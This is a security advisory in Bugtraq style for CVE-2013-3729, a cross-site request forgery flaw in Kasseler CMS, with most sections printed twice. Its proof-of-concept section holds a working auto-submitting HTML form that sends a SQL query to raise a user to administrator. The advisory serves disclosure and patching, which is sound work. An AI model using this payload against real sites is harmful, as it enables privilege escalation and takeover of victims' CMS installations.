Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
BID:60929
Info
Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
| Bugtraq ID: | 60929 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-3729 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2013 12:00AM |
| Updated: | Jul 03 2013 12:00AM |
| Credit: | High-Tech Bridge Security Research Lab |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
Kasseler CMS is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Kasseler CMS 2 r1223 is vulnerable; other versions may also be affected.
Kasseler CMS is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Kasseler CMS 2 r1223 is vulnerable; other versions may also be affected.
Exploit / POC
Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<form action="http://www.example.com/admin.php?module=database&do=sql_query " method="post" name="main">
<input type="hidden" name="query" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` = '1' WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<form action="http://www.example.com/admin.php?module=database&do=sql_query " method="post" name="main">
<input type="hidden" name="query" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` = '1' WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
Solution / Fix
Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Kasseler CMS CVE-2013-3729 Cross Site Request Forgery Vulnerability
References:
References:
- Kasseler CMS Home Page (Kasseler CMS)